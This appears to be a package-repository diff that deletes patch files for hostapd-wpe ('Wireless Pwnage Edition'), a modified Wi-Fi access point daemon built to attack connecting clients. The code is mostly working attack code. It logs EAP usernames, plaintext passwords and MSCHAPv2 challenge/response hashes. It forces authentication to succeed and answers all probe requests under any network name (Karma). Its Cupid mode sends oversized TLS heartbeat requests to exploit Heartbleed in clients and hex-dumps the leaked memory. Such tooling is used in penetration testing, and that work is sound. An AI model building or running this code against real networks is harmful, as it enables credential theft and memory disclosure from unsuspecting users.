+void wpe_hexdump(unsigned char *bp, unsigned int length)
+{
+
+ /* stolen from tcpdump, then kludged extensively */
+
+ static const char asciify[] =
+ "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";
+
+ const unsigned short *sp;
+ const unsigned char *ap;
+ unsigned int i, j;
+ int nshorts, nshorts2;
+ int padding;
+
+ wpe_log_file_and_stdout("\n\t");
+ padding = 0;
+ sp = (unsigned short *)bp;
+ ap = (unsigned char *)bp;
+ nshorts = (unsigned int)length / sizeof(unsigned short);
+ nshorts2 = (unsigned int)length / sizeof(unsigned short);
+ i = 0;
+ j = 0;
+ while (1) {
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" %04x", ntohs(*sp));
+ sp++;
+ if ((++i % 8) == 0)
+ break;
+ }
+ if (nshorts < 0) {
+ if ((length & 1) && (((i - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp);
+ padding++;
+ }
+ nshorts = (8 - (nshorts2 - nshorts));
+ while (--nshorts >= 0) {
+ wpe_log_file_and_stdout(" ");
+ }
+ if (!padding)
+ wpe_log_file_and_stdout(" ");
+ }
+ wpe_log_file_and_stdout(" ");
+
+ while (--nshorts2 >= 0) {
+ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]);
+ ap += 2;
+ if ((++j % 8) == 0) {
+ wpe_log_file_and_stdout("\n\t");
+ break;
+ }
+ }
+ if (nshorts2 < 0) {
+ if ((length & 1) && (((j - 1) % 8) != 0)) {
+ wpe_log_file_and_stdout("%c", asciify[*ap]);
+ }
+ break;
+ }
+ }
+ if ((length & 1) && (((i - 1) % 8) == 0)) {
+ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp);
+ wpe_log_file_and_stdout(" %c",
+ asciify[*ap]);
+ }
+ wpe_log_file_and_stdout("\n");
+}
+
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) {
+ if (v_content_type == TLS1_RT_HEARTBEAT) {
+ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n");
+ v_ssl->tlsext_hb_pending = 1;
+ wpe_hexdump((unsigned char *)v_buf, v_len);
+ }
+}
+
+
+char *wpe_hb_clear() {
+ char *p;
+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.2/src/wpe/wpe.h hostapd-2.2-wpe/src/wpe/wpe.h
--- hostapd-2.2/src/wpe/wpe.h 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/wpe.h 2014-08-14 08:45:54.657127982 -0400
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();

21
net-wireless/hostapd/files/hostapd-2.5-ntdomain.patch
View file

@ -1,21 +0,0 @@
--- hostapd-2.5-wpe.orig/src/eap_server/eap_server_mschapv2.c 2015-12-06 22:10:05.000000000 +0800
+++ hostapd-2.5-wpe/src/eap_server/eap_server_mschapv2.c 2015-12-06 22:23:31.459478038 +0800
@@ -330,8 +330,6 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
- challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
- wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -376,6 +374,9 @@
}
#endif /* CONFIG_TESTING_OPTIONS */
+ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
+
if (username_len != user_len ||
os_memcmp(username, user, username_len) != 0) {
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Mismatch in user names");

855
net-wireless/hostapd/files/hostapd-2.5-wpe.patch
View file

@ -1,855 +0,0 @@
diff -rupN hostapd-2.5/hostapd/config_file.c hostapd-2.5-wpe/hostapd/config_file.c
--- hostapd-2.5/hostapd/config_file.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/hostapd/config_file.c 2015-10-25 19:25:49.543351020 +0100
@@ -21,6 +21,7 @@
#include "ap/ap_config.h"
#include "config_file.h"
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -2056,6 +2057,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.5/hostapd/main.c hostapd-2.5-wpe/hostapd/main.c
--- hostapd-2.5/hostapd/main.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/hostapd/main.c 2015-10-25 19:35:41.220483130 +0100
@@ -29,6 +29,7 @@
#include "eap_register.h"
#include "ctrl_iface.h"
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -422,11 +423,17 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
- "User space daemon for IEEE 802.11 AP management,\n"
+ "hostapd-wpe v" VERSION_STR "\n"
+ "User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2015, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Brad Antoniewicz <@brad_anton>\n"
+ "Foundstone\n");
}
@@ -435,7 +442,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd-wpe [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>] \\\n"
" <configuration file(s)>\n"
@@ -457,7 +464,12 @@ static void usage(void)
" (records all messages regardless of debug verbosity)\n"
#endif /* CONFIG_DEBUG_LINUX_TRACING */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -587,7 +599,8 @@ int main(int argc, char *argv[])
interfaces.global_ctrl_dst = NULL;
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:kcs");
+
if (c < 0)
break;
switch (c) {
@@ -648,6 +661,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
default:
usage();
break;
diff -rupN hostapd-2.5/hostapd/Makefile hostapd-2.5-wpe/hostapd/Makefile
--- hostapd-2.5/hostapd/Makefile 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/hostapd/Makefile 2015-10-25 19:40:08.627224025 +0100
@@ -62,6 +62,7 @@ OBJS += ../src/ap/preauth_auth.o
OBJS += ../src/ap/pmksa_cache_auth.o
OBJS += ../src/ap/ieee802_11_shared.o
OBJS += ../src/ap/beacon.o
+OBJS += ../src/wpe/wpe.o
OBJS += ../src/ap/bss_load.o
OBJS_c = hostapd_cli.o ../src/common/wpa_ctrl.o ../src/utils/os_$(CONFIG_OS).o
@@ -934,7 +935,7 @@ OBJS += ../src/fst/fst_ctrl_iface.o
endif
endif
-ALL=hostapd hostapd_cli
+ALL=hostapd-wpe hostapd-wpe_cli
all: verify_config $(ALL)
@@ -981,15 +982,15 @@ install: $(addprefix $(DESTDIR)$(BINDIR)
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd-wpe: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd-wpe_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS)
@@ -1036,7 +1037,7 @@ lcov-html:
clean:
$(MAKE) -C ../src clean
- rm -f core *~ *.o hostapd hostapd_cli nt_password_hash hlr_auc_gw
+ rm -f core *~ *.o hostapd-wpe hostapd-wpe_cli nt_password_hash hlr_auc_gw
rm -f *.d *.gcno *.gcda *.gcov
rm -f lcov.info
rm -rf lcov-html
diff -rupN hostapd-2.5/src/ap/beacon.c hostapd-2.5-wpe/src/ap/beacon.c
--- hostapd-2.5/src/ap/beacon.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/ap/beacon.c 2015-10-25 19:45:25.530335207 +0100
@@ -30,6 +30,7 @@
#include "hs20.h"
#include "dfs.h"
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -754,6 +755,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_P2P */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res == NO_SSID_MATCH) {
diff -rupN hostapd-2.5/src/ap/ieee802_11.c hostapd-2.5-wpe/src/ap/ieee802_11.c
--- hostapd-2.5/src/ap/ieee802_11.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/ap/ieee802_11.c 2015-10-25 19:47:22.673322551 +0100
@@ -43,6 +43,7 @@
#include "ieee802_11.h"
#include "dfs.h"
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -1249,8 +1250,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.5/src/crypto/tls_openssl.c hostapd-2.5-wpe/src/crypto/tls_openssl.c
--- hostapd-2.5/src/crypto/tls_openssl.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/crypto/tls_openssl.c 2015-10-25 20:03:51.323951441 +0100
@@ -20,6 +20,7 @@
#include <openssl/err.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -36,6 +37,8 @@
#include "sha256.h"
#include "tls.h"
+#include "wpe/wpe.h"
+
#if OPENSSL_VERSION_NUMBER < 0x10000000L
/* ERR_remove_thread_state replaces ERR_remove_state and the latter is
* deprecated. However, OpenSSL 0.9.8 doesn't include
@@ -73,6 +76,8 @@ static BIO * BIO_from_keystore(const cha
}
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
static int tls_ex_idx_session = -1;
@@ -1138,7 +1143,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -3089,8 +3097,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -3150,6 +3160,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -3265,6 +3294,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -3272,6 +3305,9 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -4069,6 +4105,65 @@ int tls_connection_set_session_ticket_cb
#endif /* EAP_FAST || EAP_FAST_DYNAMIC || EAP_SERVER_FAST */
}
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
int tls_get_library_version(char *buf, size_t buf_len)
{
diff -rupN hostapd-2.5/src/eap_server/eap_server.c hostapd-2.5-wpe/src/eap_server/eap_server.c
--- hostapd-2.5/src/eap_server/eap_server.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server.c 2015-10-25 20:06:23.685009957 +0100
@@ -23,7 +23,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -164,6 +165,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -175,6 +178,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -rupN hostapd-2.5/src/eap_server/eap_server_mschapv2.c hostapd-2.5-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.5/src/eap_server/eap_server_mschapv2.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server_mschapv2.c 2015-10-25 20:11:57.318992345 +0100
@@ -13,6 +13,7 @@
#include "crypto/random.h"
#include "eap_i.h"
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +292,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -329,6 +330,8 @@ static void eap_mschapv2_process_respons
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -406,6 +409,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp_const(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -446,6 +454,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.5/src/eap_server/eap_server_peap.c hostapd-2.5-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.5/src/eap_server/eap_server_peap.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server_peap.c 2015-10-25 20:17:20.693699507 +0100
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
diff -rupN hostapd-2.5/src/eap_server/eap_server_ttls.c hostapd-2.5-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.5/src/eap_server/eap_server_ttls.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server_ttls.c 2015-10-25 20:46:06.516768323 +0100
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -530,7 +530,7 @@ static void eap_ttls_process_phase2_pap(
const u8 *user_password,
size_t user_password_len)
{
- if (!sm->user || !sm->user->password || sm->user->password_hash ||
+ if (!sm->user || !sm->user->password || sm->user->password_hash ||
!(sm->user->ttls_auth & EAP_TTLS_AUTH_PAP)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: No plaintext user "
"password configured");
@@ -538,9 +538,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp_const(sm->user->password, user_password,
- user_password_len) != 0) {
+ user_password_len) != 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -602,9 +604,10 @@ static void eap_ttls_process_phase2_chap
/* MD5(Ident + Password + Challenge) */
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
+
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) ==
- 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -671,8 +674,11 @@ static void eap_ttls_process_phase2_msch
else
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
+
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) {
+
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -694,7 +700,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -778,7 +784,11 @@ static void eap_ttls_process_phase2_msch
nt_response);
}
- rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+ rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
+
#ifdef CONFIG_TESTING_OPTIONS
{
u8 challenge2[8];
diff -rupN hostapd-2.5/src/Makefile hostapd-2.5-wpe/src/Makefile
--- hostapd-2.5/src/Makefile 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/Makefile 2015-10-25 20:46:39.159659989 +0100
@@ -1,4 +1,4 @@
-SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
+SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps wpe
SUBDIRS += fst
all:
diff -rupN hostapd-2.5/src/utils/wpa_debug.c hostapd-2.5-wpe/src/utils/wpa_debug.c
--- hostapd-2.5/src/utils/wpa_debug.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/utils/wpa_debug.c 2015-10-25 20:48:00.797890010 +0100
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.5/src/wpe/Makefile hostapd-2.5-wpe/src/wpe/Makefile
--- hostapd-2.5/src/wpe/Makefile 1970-01-01 01:00:00.000000000 +0100
+++ hostapd-2.5-wpe/src/wpe/Makefile 2015-10-25 16:52:26.349508655 +0100
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
